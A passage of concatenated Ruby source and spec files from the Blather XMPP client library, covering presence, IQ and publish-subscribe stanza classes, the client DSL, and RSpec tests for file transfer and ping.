# generated only by a server on behalf of a user.
#
# * `:error` -- An error has occurred regarding processing or delivery of a
# previously-sent presence stanza.
#
# Blather provides a helper for each possible type:
#
# Presence#unavailabe?
# Presence#unavailable?
# Presence#subscribe?
# Presence#subscribed?
# Presence#unsubscribe?
# Presence#unsubscribed?
# Presence#probe?
# Presence#error?
#
# Blather treats the `type` attribute like a normal ruby object attribute
# providing a getter and setter. The default `type` is nil.
#
# presence = Presence.new
# presence.type # => nil
# presence.type = :unavailable
# presence.unavailable? # => true
# presence.error? # => false
#
# presence.type = :invalid # => RuntimeError
#
# @handler :presence
class Presence < Stanza
  # @private
  VALID_TYPES = [:unavailable,
                 :subscribe,
                 :subscribed,
                 :unsubscribe,
                 :unsubscribed,
                 :probe,
                 :error].freeze

  register :presence

  # Import an XML node as the most specific Presence class.
  #
  # Decorator modules are collected from any registered child elements,
  # then a Status decorator is added for available/unavailable stanzas and
  # a Subscription decorator for the *subscribe* family of types.
  def self.import(node, *decorators) # :nodoc:
    node.children.each do |child|
      href = child.namespace ? child.namespace.href : nil
      registered = class_from_registration(child.element_name, href)
      decorators << registered if registered
    end

    case node['type']
    when nil, 'unavailable' then decorators << Status
    when /subscribe/        then decorators << Subscription
    end

    super node, *decorators
  end

  # Ensure element_name is "presence" for all subclasses
  def self.new(*args)
    super :presence
  end

  # Define a boolean helper for every valid presence type:
  #
  #   #unavailable?, #subscribe?, #subscribed?, #unsubscribe?,
  #   #unsubscribed?, #probe?, #error?
  #
  # Each returns true when the stanza's type matches that presence type.
  VALID_TYPES.each do |valid_type|
    define_method(:"#{valid_type}?") { self.type == valid_type }
  end

  # Ensures type is one of Blather::Stanza::Presence::VALID_TYPES (or nil)
  #
  # @param [#to_sym] type the Presence type. Must be one of VALID_TYPES
  # @raise [ArgumentError] when given an unrecognized type
  def type=(type)
    if type && !VALID_TYPES.include?(type.to_sym)
      raise ArgumentError, "Invalid Type (#{type}), use: #{VALID_TYPES*' '}"
    end
    super
  end
end
end #Stanza
end
<file_sep>/lib/blather/stanza/pubsub/event.rb
module Blather
class Stanza
class PubSub
# # PubSub Event Stanza
#
# [XEP-0060](http://xmpp.org/extensions/xep-0060.html)
#
# The PubSub Event stanza is used in many places. Please see the XEP for more
# information.
#
# @handler :pubsub_event
class Event < Message
# @private
SHIM_NS = 'http://jabber.org/protocol/shim'.freeze
register :pubsub_event, :event, 'http://jabber.org/protocol/pubsub#event'
# Ensures the event_node is created
# @private
def self.new(type = nil)
node = super
node.event_node
node
end
# Kill the event_node node before running inherit
# (prevents a duplicate <event/> element when inheriting a parsed node)
# @private
def inherit(node)
event_node.remove
super
end
# Get the name of the node this event refers to.
# Read from the <purge/> element for purge events, otherwise from <items/>.
#
# @return [String, nil]
def node
!purge? ? items_node[:node] : purge_node[:node]
end
# Get the ids of any retracted items
#
# NOTE(review): the '//' XPath searches from the document root, so this
# assumes one event per document -- confirm before reusing documents.
#
# @return [Array<String>]
def retractions
items_node.find('//ns:retract', :ns => self.class.registered_ns).map do |i|
i[:id]
end
end
# Check if this is a retractions stanza
#
# @return [Boolean]
def retractions?
!retractions.empty?
end
# Get the list of items attached to this event
#
# @return [Array<Blather::Stanza::PubSub::PubSubItem>]
def items
items_node.find('//ns:item', :ns => self.class.registered_ns).map do |i|
PubSubItem.new(nil,nil,self.document).inherit i
end
end
# Check if this stanza has items
#
# @return [Boolean]
def items?
!items.empty?
end
# Check if this is a purge stanza
# (returns the purge node itself, which is truthy when present)
#
# @return [XML::Node, nil]
def purge?
purge_node
end
# Get or create the actual event node
#
# @return [Blather::XMPPNode]
def event_node
node = find_first('//ns:event', :ns => self.class.registered_ns)
# NOTE(review): this fallback passes the namespace positionally rather
# than as :ns -- verify it matches find_first's signature; it appears
# intended to catch namespace-less <event> elements.
node = find_first('//event', self.class.registered_ns) unless node
unless node
(self << (node = XMPPNode.new('event', self.document)))
node.namespace = self.class.registered_ns
end
node
end
# Get or create the actual items node
# The namespace is only assigned when the node is freshly created.
#
# @return [Blather::XMPPNode]
def items_node
node = find_first('ns:event/ns:items', :ns => self.class.registered_ns)
unless node
(self.event_node << (node = XMPPNode.new('items', self.document)))
node.namespace = event_node.namespace
end
node
end
# Get the actual purge node, if any (never created here)
#
# @return [Blather::XMPPNode, nil]
def purge_node
event_node.find_first('//ns:purge', :ns => self.class.registered_ns)
end
# Get the subscription IDs (SHIM headers named "SubID") for this event
#
# @return [Array<String>]
def subscription_ids
find('//ns:header[@name="SubID"]', :ns => SHIM_NS).map do |n|
n.content
end
end
# Check if this is a subscription stanza
# (returns the subscription node itself, which is truthy when present)
#
# @return [XML::Node, nil]
def subscription?
subscription_node
end
# Get the actual subscription node, if any (never created here)
#
# @return [Blather::XMPPNode, nil]
def subscription_node
event_node.find_first('//ns:subscription', :ns => self.class.registered_ns)
end
alias_method :subscription, :subscription_node
end # Event
end # PubSub
end # Stanza
end # Blather
<file_sep>/lib/blather/client/dsl.rb
require File.join(File.dirname(__FILE__), 'client')
module Blather
# # Blather DSL
#
# The DSL is a set of methods that enables you to write cleaner code. Being a
# module means it can be included in or extend any class you may want to
# create.
#
# Every stanza handler is registered as a method on the DSL.
#
# @example Include the DSL in the top level namespace.
#
# require 'blather/client'
# when_ready { puts "Connected! Send messages to #{jid.stripped}." }
#
# subscription :request? do |s|
# write_to_stream s.approve!
# end
#
# message :chat?, :body => 'exit' do |m|
# say m.from, 'Exiting ...'
# shutdown
# end
#
# message :chat?, :body do |m|
# say m.from, "You sent: #{m.body}"
# end
#
# @example Set the DSL to its own namespace.
#
# require 'blather/client/dsl'
# module Echo
# extend Blather::DSL
#
# when_ready { puts "Connected! Send messages to #{jid.stripped}." }
#
# subscription :request? do |s|
# write_to_stream s.approve!
# end
#
# message :chat?, :body => 'exit' do |m|
# say m.from, 'Exiting ...'
# shutdown
# end
#
# message :chat?, :body do |m|
# say m.from, "You sent: #{m.body}"
# end
# end
#
# Echo.setup '<EMAIL>', 'foobar'
#
# EM.run { Echo.run }
#
# @example Create a class out of it
#
# require 'blather/client/dsl'
# class Echo
# include Blather::DSL
# end
#
# echo = Echo.new
# echo.setup '<EMAIL>', 'foobar'
# echo.when_ready { puts "Connected! Send messages to #{jid.stripped}." }
#
# echo.subscription :request? do |s|
# write_to_stream s.approve!
# end
#
# echo.message :chat?, :body => 'exit' do |m|
# say m.from, 'Exiting ...'
# shutdown
# end
#
# echo.message :chat?, :body do |m|
# say m.from, "You sent: #{m.body}"
# end
#
# EM.run { echo.run }
#
module DSL
autoload :PubSub, File.expand_path(File.join(File.dirname(__FILE__), *%w[dsl pubsub]))
# When included, define an instance method for every registered stanza
# handler so `message(...)`, `iq(...)`, etc. are available on the includer.
def self.append_features(o)
# Generate a method for every stanza handler that exists.
Blather::Stanza.handler_list.each do |handler_name|
o.__send__ :define_method, handler_name do |*args, &callback|
handle handler_name, *args, &callback
end
end
super
end
# When the DSL is used via `extend`, generate the handler methods on this
# module itself so they become singleton methods of the extending object.
def self.extended(o)
# Generate a method for every stanza handler that exists.
Blather::Stanza.handler_list.each do |handler_name|
module_eval <<-METHOD, __FILE__, __LINE__
def #{handler_name}(*args, &callback)
handle :#{handler_name}, *args, &callback
end
METHOD
end
super
end
# The actual client connection (lazily created)
#
# @return [Blather::Client]
def client
@client ||= Client.new
end
module_function :client
# A pubsub helper scoped to the connection's domain (lazily created)
#
# @return [Blather::PubSub]
def pubsub
@pubsub ||= PubSub.new client, jid.domain
end
# Push data to the stream
# This works such that it can be chained:
# self << stanza1 << stanza2 << "raw data"
#
# @param [#to_xml, #to_s] stanza data to send down the wire
# @return [self]
def <<(stanza)
client.write stanza
self
end
# Prepare server settings
#
# @param [#to_s] jid the JID to authenticate with
# @param [#to_s] password the password to authenticate with
# @param [String] host (optional) the host to connect to (can be an IP). If
# this is `nil` the domain on the JID will be used
# @param [Fixnum, String] port (optional) the port to connect on
# @param certs (optional) the certificate trust store -- passed straight
# through to Blather::Client#setup
# @param [Fixnum] connection_timeout (optional) the time to wait for connection to succeed before timing out
# @param [Hash] options (optional) further connection options
def setup(jid, password, host = nil, port = nil, certs = nil, connection_timeout = nil, options = {})
client.setup(jid, password, host, port, certs, connection_timeout, options)
end
# Connect to the server. Must be run in the EventMachine reactor
def run
client.run
end
# Shutdown the connection.
# Flushes the write buffer then stops EventMachine
def shutdown
client.close
end
# Setup a before filter
#
# @param [Symbol] handler (optional) the stanza handler the filter should
# run before
# @param [guards] guards (optional) a set of guards to check the stanza
# against
# @yield [Blather::Stanza] stanza
def before(handler = nil, *guards, &block)
client.register_filter :before, handler, *guards, &block
end
# Setup an after filter
#
# @param [Symbol] handler (optional) the stanza handler the filter should
# run after
# @param [guards] guards (optional) a set of guards to check the stanza
# against
# @yield [Blather::Stanza] stanza
def after(handler = nil, *guards, &block)
client.register_filter :after, handler, *guards, &block
end
# Set handler for a stanza type
#
# @param [Symbol] handler the stanza type it should handle
# @param [guards] guards (optional) a set of guards to check the stanza
# against
# @yield [Blather::Stanza] stanza
def handle(handler, *guards, &block)
client.register_handler handler, *guards, &block
end
# Wrapper for "handle :ready" (just a bit of syntactic sugar)
#
# This is run after the connection has been completely setup
def when_ready(&block)
handle :ready, &block
end
# Wrapper for "handle :disconnected"
#
# This is run after the connection has been shut down.
#
# @example Reconnect after a disconnection
# disconnected { client.run }
def disconnected(&block)
handle :disconnected, &block
end
# Set current status
#
# @param [Blather::Stanza::Presence::State::VALID_STATES] state the current
# state
# @param [#to_s] msg the status message to use
def set_status(state = nil, msg = nil)
client.status = state, msg
end
# Direct access to the roster
#
# @return [Blather::Roster]
def my_roster
client.roster
end
# Write data to the stream
#
# @param [#to_xml, #to_s] stanza the data to send down the wire.
def write_to_stream(stanza)
client.write stanza
end
# Helper method to join a MUC room
#
# @overload join(room_jid, nick)
#   @param [Blather::JID, #to_s] room the full JID of the room to join;
#     the second argument is then used as the nickname
#   @param [#to_s] service the nickname to join the room as
# @overload join(room, service, nickname)
#   @param [#to_s] room the name of the room to join
#   @param [Blather::JID, #to_s] service the service domain the room is hosted at
#   @param [#to_s] nickname the nickname to join the room as
def join(room, service, nickname = nil)
join = Blather::Stanza::Presence::MUC.new
join.to = if nickname
"#{room}@#{service}/#{nickname}"
else
# Two-argument form: `room` is the room JID, `service` is the nickname.
"#{room}/#{service}"
end
client.write join
end
# Helper method to make sending basic messages easier
#
# @param [Blather::JID, #to_s] to the JID of the message recipient
# @param [#to_s] msg the message to send
# @param [#to_sym] using the stanza type to use (defaults to :chat)
def say(to, msg, using = :chat)
client.write Blather::Stanza::Message.new(to, msg, using)
end
# The JID according to the server
#
# @return [Blather::JID]
def jid
client.jid
end
# Halt the handler chain
#
# Use this to stop the propagation of the stanza though the handler chain.
#
# @example Ignore all IQ stanzas
#
# before(:iq) { halt }
def halt
throw :halt
end
# Pass responsibility to the next handler
#
# Use this to jump out of the current handler and let the next registered
# handler take care of the stanza
#
# @example Pass a message to the next handler
#
# This is contrived and should be handled with guards, but pass a message
# to the next handler based on the content
#
# message { |s| puts "message caught" }
# message { |s| pass if s.body =~ /pass along/ }
def pass
throw :pass
end
# Request items or info from an entity
# discover (items|info), [jid], [node] do |response|
# end
# A temporary handler keyed on the stanza id receives the response.
def discover(what, who, where, &callback)
stanza = Blather::Stanza.class_from_registration(:query, "http://jabber.org/protocol/disco##{what}").new
stanza.to = who
stanza.node = where
client.register_tmp_handler stanza.id, &callback
client.write stanza
end
# Set the capabilities of the client
#
# @param [String] node the URI
# @param [Array<Hash>] identities an array of identities
# @param [Array<Hash>] features an array of features
def set_caps(node, identities, features)
client.caps.node = node
client.caps.identities = identities
client.caps.features = features
end
# Send capabilities to the server, and answer subsequent disco-info
# queries for the advertised caps node with a copy of the caps stanza.
def send_caps
client.register_handler :disco_info, :type => :get, :node => client.caps.node do |s|
r = client.caps.dup
r.to = s.from
r.id = s.id
client.write r
end
client.write client.caps.c
end
end # DSL
end # Blather
<file_sep>/lib/blather/stanza/iq.rb
module Blather
class Stanza
# # Iq Stanza
#
# [RFC 3920 Section 9.2.3 - IQ Semantics](http://xmpp.org/rfcs/rfc3920.html#rfc.section.9.2.3)
#
# Info/Query, or IQ, is a request-response mechanism, similar in some ways
# to HTTP. The semantics of IQ enable an entity to make a request of, and
# receive a response from, another entity. The data content of the request
# and response is defined by the namespace declaration of a direct child
# element of the IQ element, and the interaction is tracked by the
# requesting entity through use of the 'id' attribute. Thus, IQ interactions
# follow a common pattern of structured data exchange such as get/result or
# set/result (although an error may be returned in reply to a request if
# appropriate).
#
# ## "ID" Attribute
#
# Iq Stanzas require the ID attribute be set. Blather will handle this
# automatically when a new Iq is created.
#
# ## "Type" Attribute
#
# * `:get` -- The stanza is a request for information or requirements.
#
# * `:set` -- The stanza provides required data, sets new values, or
# replaces existing values.
#
# * `:result` -- The stanza is a response to a successful get or set request.
#
# * `:error` -- An error has occurred regarding processing or delivery of a
# previously-sent get or set (see Stanza Errors).
#
# Blather provides a helper for each possible type:
#
# Iq#get?
# Iq#set?
# Iq#result?
# Iq#error?
#
# Blather treats the `type` attribute like a normal ruby object attribute
# providing a getter and setter. The default `type` is `get`.
#
# iq = Iq.new
# iq.type # => :get
# iq.get? # => true
# iq.type = :set
# iq.set? # => true
# iq.get? # => false
#
# iq.type = :invalid # => ArgumentError
#
# @handler :iq
class Iq < Stanza
  # @private
  VALID_TYPES = [:get, :set, :result, :error].freeze

  register :iq

  # Import an XML node, delegating to a more specific Iq subclass when one
  # is registered for any of the node's child elements.
  # @private
  def self.import(node)
    klass = nil
    node.children.each do |child|
      href = child.namespace ? child.namespace.href : nil
      klass = class_from_registration(child.element_name, href)
      break if klass
    end

    if klass && klass != self
      klass.import(node)
    else
      new(node[:type]).inherit(node)
    end
  end

  # Create a new Iq
  #
  # @param [Symbol, nil] type the type of stanza (:get, :set, :result, :error)
  # @param [Blather::JID, String, nil] to the JID of the intended recipient
  # @param [#to_s] id the stanza's ID. Leaving this nil will set the ID to
  #   the next unique number
  def self.new(type = nil, to = nil, id = nil)
    (super :iq).tap do |stanza|
      stanza.type = type || :get
      stanza.to = to
      stanza.id = id || next_id
    end
  end

  # Define a boolean helper for every valid IQ type:
  #
  #   #get?, #set?, #result?, #error?
  #
  # Each returns true when the stanza's type matches.
  VALID_TYPES.each do |valid_type|
    define_method(:"#{valid_type}?") { self.type == valid_type }
  end

  # Ensures type is :get, :set, :result or :error
  #
  # @param [#to_sym] type the Iq type. Must be one of VALID_TYPES
  # @raise [ArgumentError] when given an unrecognized type
  def type=(type)
    if type && !VALID_TYPES.include?(type.to_sym)
      raise ArgumentError, "Invalid Type (#{type}), use: #{VALID_TYPES*' '}"
    end
    super
  end

  # Overrides the parent method to ensure the reply is of type :result and
  # that all children are removed (unless :remove_children => false).
  #
  # @param [Hash] opts options passed through to the parent reply!
  # @option opts [Boolean] :remove_children whether to strip child nodes
  #   when replying (defaults to true)
  # @return [self]
  def reply!(opts = {})
    super({:remove_children => true}.merge(opts))
    self.type = :result
    self
  end
end
end
end
<file_sep>/lib/blather/stanza/presence/subscription.rb
module Blather
class Stanza
class Presence
# # Subscription Stanza
#
# [RFC 3921 Section 8 - Integration of Roster Items and Presence Subscriptions](http://xmpp.org/rfcs/rfc3921.html#rfc.section.8)
#
# Blather handles subscription request/response through this class. It
# provides a set of helper methods to quickly transform the stanza into a
# response.
#
# @handler :subscription
class Subscription < Presence
  register :subscription, :subscription

  # Create a new Subscription stanza
  #
  # @param [Blather::JID, #to_s] to the JID to subscribe to
  # @param [Symbol, nil] type the subscription type
  def self.new(to = nil, type = nil)
    super().tap do |stanza|
      stanza.to = to
      stanza.type = type
    end
  end

  module InstanceMethods
    # Set the to value on the stanza, stripping any resource
    #
    # @param [Blather::JID, #to_s] to a JID to subscribe to
    def to=(to)
      super JID.new(to).stripped
    end

    # One-shot response helpers: each sets the stanza's type and then
    # swaps to/from (when needed) so the stanza can be written straight
    # back to the stream.
    #
    #   #approve!     -- grant an incoming request (:subscribed)
    #   #refuse!      -- deny an incoming request (:unsubscribed)
    #   #unsubscribe! -- stop receiving their presence (:unsubscribe)
    #   #cancel!      -- revoke a granted subscription (:unsubscribed)
    #   #request!     -- ask to receive their presence (:subscribe)
    #
    # @example approve an incoming request
    #   subscription(:request?) { |s| write_to_stream s.approve! }
    {
      :approve!     => :subscribed,
      :refuse!      => :unsubscribed,
      :unsubscribe! => :unsubscribe,
      :cancel!      => :unsubscribed,
      :request!     => :subscribe
    }.each do |helper, presence_type|
      define_method(helper) do
        self.type = presence_type
        reply_if_needed!
      end
    end

    # Check if the stanza is a subscription request
    #
    # @return [true, false]
    def request?
      self.type == :subscribe
    end
  end

  include InstanceMethods
end #Subscription
end #Presence
end #Stanza
end
<file_sep>/spec/support/mock_server.rb
# Placeholder server double; specs stub or reopen it to script behavior.
class MockServer; end

# Mixin for EventMachine connection objects under test: forwards every
# chunk of data received on the wire to a lazily-created MockServer,
# passing the connection itself along so the server can respond.
module ServerMock
  def receive_data(data)
    (@server ||= MockServer.new).receive_data(data, self)
  end
end
<file_sep>/lib/blather/stanza/pubsub/subscribe.rb
module Blather
class Stanza
class PubSub
# # PubSub Subscribe Stanza
#
# [XEP-0060 Section 6.1 - Subscribe to a Node](http://xmpp.org/extensions/xep-0060.html#subscriber-subscribe)
#
# @handler :pubsub_subscribe
class Subscribe < PubSub
register :pubsub_subscribe, :subscribe, self.registered_ns
# Create a new subscription node
#
# @param [Blather::Stanza::Iq::VALID_TYPES] type the IQ stanza type
# @param [String] host the host name to send the request to
# @param [String] node the node to subscribe to
# @param [Blather::JID, #to_s] jid see {#jid=}
def self.new(type = :set, host = nil, node = nil, jid = nil)
new_node = super(type, host)
new_node.node = node
new_node.jid = jid
new_node
end
# Get the JID of the entity to subscribe
#
# @return [Blather::JID]
def jid
JID.new(subscribe[:jid])
end
# Set the JID of the entity to subscribe
#
# @param [Blather::JID, #to_s] jid
def jid=(jid)
subscribe[:jid] = jid
end
# Get the name of the node to subscribe to
#
# @return [String]
def node
subscribe[:node]
end
# Set the name of the node to subscribe to
#
# @param [String] node
def node=(node)
subscribe[:node] = node
end
# Get or create the actual subscribe node on the stanza
#
# The namespace is assigned only when the node is freshly created; an
# existing node found by the namespaced lookup is already namespaced.
#
# @return [Blather::XMPPNode]
def subscribe
unless subscribe = pubsub.find_first('ns:subscribe', :ns => self.class.registered_ns)
self.pubsub << (subscribe = XMPPNode.new('subscribe', self.document))
subscribe.namespace = self.pubsub.namespace
end
subscribe
end
end # Subscribe
end # PubSub
end # Stanza
end # Blather
<file_sep>/lib/blather/stanza/pubsub/affiliations.rb
module Blather
class Stanza
class PubSub
# # PubSub Affiliations Stanza
#
# [XEP-0060 Section 8.9 - Manage Affiliations](http://xmpp.org/extensions/xep-0060.html#owner-affiliations)
#
# @handler :pubsub_affiliations
class Affiliations < PubSub
register :pubsub_affiliations, :affiliations, self.registered_ns
include Enumerable
# Expose XPath search under the conventional Enumerable-ish name
alias_method :find, :xpath
# Overrides the parent to ensure an affiliation node is created
# @private
def self.new(type = nil, host = nil)
new_node = super
new_node.affiliations
new_node
end
# Kill the affiliations node before running inherit
# (prevents a duplicate <affiliations/> when inheriting a parsed node)
# @private
def inherit(node)
affiliations.remove
super
end
# Get or create the affiliations node
#
# NOTE(review): unlike the sibling stanzas (e.g. Subscribe#subscribe), no
# namespace is assigned to a freshly-created node here -- confirm whether
# that is intentional or whether the namespaced lookup above can ever
# find it again.
#
# @return [Blather::XMPPNode]
def affiliations
aff = pubsub.find_first('ns:affiliations', :ns => self.class.registered_ns)
unless aff
self.pubsub << (aff = XMPPNode.new('affiliations', self.document))
end
aff
end
# Convenience method for iterating over the list
#
# @see #list for the format of the yielded input
def each(&block)
list.each &block
end
# Get the number of affiliation types present
#
# @return [Fixnum]
def size
list.size
end
# Get the hash of affilations as affiliation-type => [nodes]
#
# @example
#
# { :owner => ['node1', 'node2'],
# :publisher => ['node3'],
# :outcast => ['node4'],
# :member => ['node5'],
# :none => ['node6'] }
#
# @return [Hash<Symbol => Array<String>>]
def list
# NOTE(review): '//' searches from the document root; assumes a single
# affiliations list per document.
items = affiliations.find('//ns:affiliation', :ns => self.class.registered_ns)
items.inject({}) do |hash, item|
hash[item[:affiliation].to_sym] ||= []
hash[item[:affiliation].to_sym] << item[:node]
hash
end
end
end # Affiliations
end # PubSub
end # Stanza
end # Blather
<file_sep>/spec/blather/file_transfer_spec.rb
require 'spec_helper'
require 'blather/client/dsl'
# Minimal stand-in for a file-transfer handler: implements the callback
# surface Blather::FileTransfer expects (EventMachine-style lifecycle
# hooks plus #send) with no-op bodies.
module MockFileReceiver
# Called once the handler/connection is set up; no-op for these specs.
def post_init
end
# Called with each chunk of incoming file data; discarded here.
def receive_data(data)
end
# Called when the underlying connection goes away; no-op for these specs.
def unbind
end
# Called to push data out; discarded here.
def send(data, params)
end
end
# Sample stream-initiation offer (XEP-0095/0096) used by the specs below:
# a file-transfer <si/> IQ advertising both SOCKS5 bytestreams and
# in-band bytestreams as negotiable stream methods.
def si_xml
<<-XML
<iq type='set' id='offer1' to='<EMAIL>/balcony' from='<EMAIL>/orchard'>
<si xmlns='http://jabber.org/protocol/si'
id='a0'
mime-type='text/plain'
profile='http://jabber.org/protocol/si/profile/file-transfer'>
<file xmlns='http://jabber.org/protocol/si/profile/file-transfer'
name='test.txt'
size='1022'>
<range/>
</file>
<feature xmlns='http://jabber.org/protocol/feature-neg'>
<x xmlns='jabber:x:data' type='form'>
<field var='stream-method' type='list-single'>
<option><value>http://jabber.org/protocol/bytestreams</value></option>
<option><value>http://jabber.org/protocol/ibb</value></option>
</field>
</x>
</feature>
</si>
</iq>
XML
end
describe Blather::FileTransfer do
before do
@host = 'host.name'
@client = Blather::Client.setup Blather::JID.new('n@d/r'), 'pass'
end
it 'can select ibb' do
iq = Blather::XMPPNode.parse(si_xml)
# The negotiated answer should pick in-band bytestreams when s5b is off.
@client.stubs(:write).with do |answer|
expect(answer.si.feature.x.field('stream-method').value).to eq(Blather::Stanza::Iq::Ibb::NS_IBB)
true
end
transfer = Blather::FileTransfer.new(@client, iq)
transfer.allow_s5b = false
transfer.allow_ibb = true
transfer.accept(MockFileReceiver)
end
it 'can select s5b' do
iq = Blather::XMPPNode.parse(si_xml)
# The negotiated answer should pick SOCKS5 bytestreams when ibb is off.
@client.stubs(:write).with do |answer|
expect(answer.si.feature.x.field('stream-method').value).to eq(Blather::Stanza::Iq::S5b::NS_S5B)
true
end
transfer = Blather::FileTransfer.new(@client, iq)
transfer.allow_s5b = true
transfer.allow_ibb = false
transfer.accept(MockFileReceiver)
end
it 'can allow s5b private ips' do
iq = Blather::XMPPNode.parse(si_xml)
@client.stubs(:write).with do |answer|
expect(answer.si.feature.x.field('stream-method').value).to eq(Blather::Stanza::Iq::S5b::NS_S5B)
true
end
transfer = Blather::FileTransfer.new(@client, iq)
transfer.allow_s5b = true
transfer.allow_private_ips = true
transfer.allow_ibb = false
transfer.accept(MockFileReceiver)
end
it 'can response no-valid-streams' do
iq = Blather::XMPPNode.parse(si_xml)
# With every transport disabled the answer must be a cancel error
# carrying the XEP-0095 <no-valid-streams/> condition.
@client.stubs(:write).with do |answer|
expect(answer.find_first('error')['type']).to eq("cancel")
expect(answer.find_first('.//ns:no-valid-streams', :ns => 'http://jabber.org/protocol/si')).not_to be_nil
true
end
transfer = Blather::FileTransfer.new(@client, iq)
transfer.allow_s5b = false
transfer.allow_ibb = false
transfer.accept(MockFileReceiver)
end
it 'can decline transfer' do
iq = Blather::XMPPNode.parse(si_xml)
# Declining answers with a cancel/forbidden error and explanatory text.
@client.stubs(:write).with do |answer|
expect(answer.find_first('error')['type']).to eq("cancel")
expect(answer.find_first('.//ns:forbidden', :ns => 'urn:ietf:params:xml:ns:xmpp-stanzas')).not_to be_nil
expect(answer.find_first('.//ns:text', :ns => 'urn:ietf:params:xml:ns:xmpp-stanzas').content).to eq("Offer declined")
true
end
transfer = Blather::FileTransfer.new(@client, iq)
transfer.decline
end
it 'can s5b post_init include the handler' do
# Regression check: constructing a SocketConnection and running post_init
# with a handler module mixed in must not raise.
class TestS5B < Blather::FileTransfer::S5b::SocketConnection
def initialize()
super("0.0.0.0", 1, MockFileReceiver, nil)
restore_methods
self.post_init()
end
def self.new(*args)
allocate.instance_eval do
initialize(*args)
self
end
end
end
expect { TestS5B.new }.not_to raise_error
end
end
<file_sep>/lib/blather/stanza/pubsub_owner.rb
module Blather
class Stanza
# # PubSubOwner Base Class
#
# [XEP-0060 - Publish-Subscribe](http://xmpp.org/extensions/xep-0060.html)
#
# @handler :pubsub_owner
class PubSubOwner < Iq
register :pubsub_owner, :pubsub, 'http://jabber.org/protocol/pubsub#owner'
# Creates the proper class from the stanza's child
# @private
def self.import(node)
klass = nil
if pubsub = node.document.find_first('//ns:pubsub', :ns => self.registered_ns)
# Stop at the first child element with a registered class.
pubsub.children.each { |e| break if klass = class_from_registration(e.element_name, (e.namespace.href if e.namespace)) }
end
(klass || self).new(node[:type]).inherit(node)
end
# Overrides the parent to ensure a pubsub node is created
# @private
def self.new(type = nil, host = nil)
new_node = super type
new_node.to = host
new_node.pubsub
new_node
end
# Overrides the parent to ensure the pubsub node is destroyed
# (prevents duplicate <pubsub/> elements when inheriting a parsed node)
# @private
def inherit(node)
remove_children :pubsub
super
end
# Get or create the pubsub node on the stanza
# The owner namespace is assigned only when the node is freshly created.
#
# @return [Blather::XMPPNode]
def pubsub
unless p = find_first('ns:pubsub', :ns => self.class.registered_ns)
self << (p = XMPPNode.new('pubsub', self.document))
p.namespace = self.class.registered_ns
end
p
end
end # PubSubOwner
end # Stanza
end # Blather
<file_sep>/lib/blather/stanza/pubsub/subscription.rb
module Blather
class Stanza
class PubSub
# # PubSub Subscription Stanza
#
# [XEP-0060 Section 8.8 Manage Subscriptions](http://xmpp.org/extensions/xep-0060.html#owner-subscriptions)
#
# @handler :pubsub_subscription
class Subscription < PubSub
  # @private
  # Frozen for consistency with the other stanza type lists
  # (e.g. Blather::Stanza::Iq::VALID_TYPES).
  VALID_TYPES = [:none, :pending, :subscribed, :unconfigured].freeze

  register :pubsub_subscription, :subscription, self.registered_ns

  # Create a new subscription request node
  #
  # @param [Blather::Stanza::Iq::VALID_TYPES] type the IQ type
  # @param [String] host the host to send the request to
  # @param [String] node the node to look for requests on
  # @param [Blather::JID, #to_s] jid the JID of the subscriber
  # @param [String] subid the subscription ID
  # @param [VALID_TYPES] subscription the subscription type
  def self.new(type = :result, host = nil, node = nil, jid = nil, subid = nil, subscription = nil)
    new_node = super(type, host)
    new_node.node = node
    new_node.jid = jid
    new_node.subid = subid
    new_node.subscription = subscription
    new_node
  end

  # Check if the subscription state is none
  #
  # @return [Boolean]
  def none?
    self.subscription == :none
  end

  # Check if the subscription state is pending
  #
  # @return [Boolean]
  def pending?
    self.subscription == :pending
  end

  # Check if the subscription state is subscribed
  #
  # @return [Boolean]
  def subscribed?
    self.subscription == :subscribed
  end

  # Check if the subscription state is unconfigured
  #
  # @return [Boolean]
  def unconfigured?
    self.subscription == :unconfigured
  end

  # Get the JID of the subscriber
  #
  # @return [Blather::JID]
  def jid
    JID.new(subscription_node[:jid])
  end

  # Set the JID of the subscriber
  #
  # @param [Blather::JID, #to_s] jid
  def jid=(jid)
    subscription_node[:jid] = jid
  end

  # Get the name of the subscription node
  #
  # @return [String]
  def node
    subscription_node[:node]
  end

  # Set the name of the subscription node
  #
  # @param [String] node
  def node=(node)
    subscription_node[:node] = node
  end

  # Get the ID of the subscription
  #
  # @return [String]
  def subid
    subscription_node[:subid]
  end

  # Set the ID of the subscription
  #
  # @param [String] subid
  def subid=(subid)
    subscription_node[:subid] = subid
  end

  # Get the subscription type
  #
  # @return [VALID_TYPES, nil]
  def subscription
    s = subscription_node[:subscription]
    s.to_sym if s
  end

  # Set the subscription type
  #
  # @param [VALID_TYPES, nil] subscription
  # @raise [ArgumentError] when given an unrecognized subscription type
  def subscription=(subscription)
    if subscription && !VALID_TYPES.include?(subscription.to_sym)
      # BUG FIX: previously interpolated `type` (the IQ type, e.g. :result)
      # instead of the offending subscription value, hiding the actual
      # invalid input from the error message.
      raise ArgumentError, "Invalid Type (#{subscription}), use: #{VALID_TYPES*' '}"
    end
    subscription_node[:subscription] = subscription
  end

  # Get or create the actual subscription node
  # The namespace is assigned only when the node is freshly created.
  #
  # @return [Blather::XMPPNode]
  def subscription_node
    unless subscription = pubsub.find_first('ns:subscription', :ns => self.class.registered_ns)
      self.pubsub << (subscription = XMPPNode.new('subscription', self.document))
      subscription.namespace = self.pubsub.namespace
    end
    subscription
  end
end # Subscription
end # PubSub
end # Stanza
end # Blather
<file_sep>/spec/blather/stanza/iq/ping_spec.rb
require 'spec_helper'
# Sample XEP-0199 server-to-client ping IQ used by the specs below.
def ping_xml
<<-XML
<iq from='capulet.lit' to='<EMAIL>/balcony' id='s2c1' type='get'>
<ping xmlns='urn:xmpp:ping'/>
</iq>
XML
end
describe Blather::Stanza::Iq::Ping do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:ping, 'urn:xmpp:ping')).to eq(Blather::Stanza::Iq::Ping)
  end

  it 'can be imported' do
    node = Blather::XMPPNode.parse ping_xml
    expect(node).to be_instance_of Blather::Stanza::Iq::Ping
  end

  it 'ensures a ping node is present on create' do
    iq = Blather::Stanza::Iq::Ping.new
    expect(iq.xpath('ns:ping', :ns => 'urn:xmpp:ping')).not_to be_empty
  end

  it 'ensures a ping node exists when calling #ping' do
    iq = Blather::Stanza::Iq::Ping.new
    iq.ping.remove
    expect(iq.xpath('ns:ping', :ns => 'urn:xmpp:ping')).to be_empty
    expect(iq.ping).not_to be_nil
